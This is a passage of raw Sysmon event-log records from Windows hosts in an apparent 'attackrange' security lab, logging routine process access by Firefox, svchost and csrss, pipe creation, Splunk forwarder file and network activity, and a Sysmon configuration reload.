Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001050289Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:06.268{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-5563-60E8-2010-00000000CF01}4048C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla 
Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001050288Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:56:06.268{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.4048.409.183797942C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001050287Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:56:06.268{466BC892-5563-60E8-2010-00000000CF01}4048\chrome.4048.409.183797942C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000808244Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:07.494{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8224454075652966D278A415702913C,SHA256=C7EADB6007933400EE071067BE77362063521E96A0CA8B7A407D621AC9529C97,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050301Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:07.721{466BC892-F49A-60EB-327D-00000000CF01}61886504C:\Windows\system32\conhost.exe{466BC892-F597-60EB-5C7D-00000000CF01}8756C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050300Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:07.721{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050299Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:07.721{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050298Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:07.721{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050297Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:07.721{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050296Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:07.721{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F597-60EB-5C7D-00000000CF01}8756C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050295Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:07.721{466BC892-F49A-60EB-317D-00000000CF01}95726844C:\Windows\system32\cmd.exe{466BC892-F597-60EB-5C7D-00000000CF01}8756C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050294Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:07.725{466BC892-F597-60EB-5C7D-00000000CF01}8756C:\Program Files\ansible\sysmon\Sysmon64.exe13.01System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-Sysmon64.exe -c C:\Program Files\ansible\sysmon\ATTACKRANGE\Administrator{466BC892-F49A-60EB-D4CC-F90400000000}0x4f9ccd43HighMD5=8A914CFB7496B8461285C009DD8F5627,SHA256=422EC998FED690C2EC3239A4BB80075F098A9A95CBDFFBC873365B9F7136A02A,IMPHASH=DCF866F4139DD7FF6C0A5D4FA050CD7A{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" 23542300x80000000000000001050293Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:07.336{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F61A73C796EE4B5B2516A9CE497D201F,SHA256=F848D9454AC097BE5D0E68A8F2A832C38BF0E3CD9D6CFBE34DBCDDCA3E962714,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808246Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:07.205{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57315-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808245Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:08.494{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3206D4B318068142372D27B304709BEF,SHA256=DAC77E7377B00EB946FB2E005FB2AA90218FE49B3BFA401C092D372879EA3362,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050304Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:08.722{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3CC8841E1E0F0426AF1627B306D0CB57,SHA256=E76E153D228A14A29B67BA61FF215F07D945CC91E05D69FC5BBA46643C2C3EBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050303Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:08.722{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A114D5F4DC5A6ADD829A28B16DD95646,SHA256=410E7A98D69D140B6CDF9E576853EE35DBB6C5E00590C7FE253C7C327053BFD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050302Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:08.353{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E53F2F155BE50C6B649C02FAF7C6FFC1,SHA256=922051AA3C1218CF650C56E480C9E5EB3BB915F62BCBF41C7140229AF596A2F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808247Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:09.494{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9F75E9B59A1AB9133930EED41D2D56E,SHA256=ADA282911088122D0A17962F6DDCBF7EDE9595C6EB4590A6CD3B8A853D1AE429,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050306Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:01.578{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51081-false10.0.1.12-8000- 23542300x80000000000000001050305Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:09.354{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAA07E426A1C4E46D425C0C90CBFF5F1,SHA256=EFE6B20B1AFCA9FDF8B28A4F549FBE3BF8B522179AC4E2BC3859D05249EBD9A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808248Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:10.510{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95E5404C57E5705AD7A338E576B99E90,SHA256=0EC9867E8BCC078B466D90D9C6E2C88A9548A00566F1F73880DD200AF0FD79F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050307Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:10.407{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B582E0F1437DF3E76A8A63B81E895BC6,SHA256=DB9AE191F7019A0A7E7AF7B4388436FC272BC0700F5F36F586FD206A0D12623A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808249Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:11.526{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2164377C452FED2BFC6F1E61746F31C6,SHA256=A84C8CF93080C7683B5C4BA78BF43CED0CCF941B8C8784E272D395A3F5E77524,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050309Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:11.423{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3CC8841E1E0F0426AF1627B306D0CB57,SHA256=E76E153D228A14A29B67BA61FF215F07D945CC91E05D69FC5BBA46643C2C3EBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050308Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:11.408{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E5408F5CC46EEF0BD68D7F166D2F878,SHA256=FC2C9B43DC43814143F6F7CC6CD084E7D026EC651C860288A869E50E3105D9E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808250Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:12.526{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65698F0398693154E2453CE0A30F5924,SHA256=F2EB235BFE71D0DEB419CA31A4095041A0F2DD457456A46618C46673463B357F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050383Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.423{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=406F492C6E0CAFFBDB16F946BE6F6534,SHA256=A52FD2EC8A24CBCE31F538A8699E7C5B05888039D922A7DACA389EF9E92EF911,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050382Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.307{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65AC2FE3CD8B711FA2DB6C3FB9287A82,SHA256=FBBC738EBD0466A0048547DD02BA637266B0145C7CA1BD8C86E81FEFFEDD7F32,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050381Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050380Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001050379Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050378Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050377Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050376Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050375Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050374Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050373Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050372Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 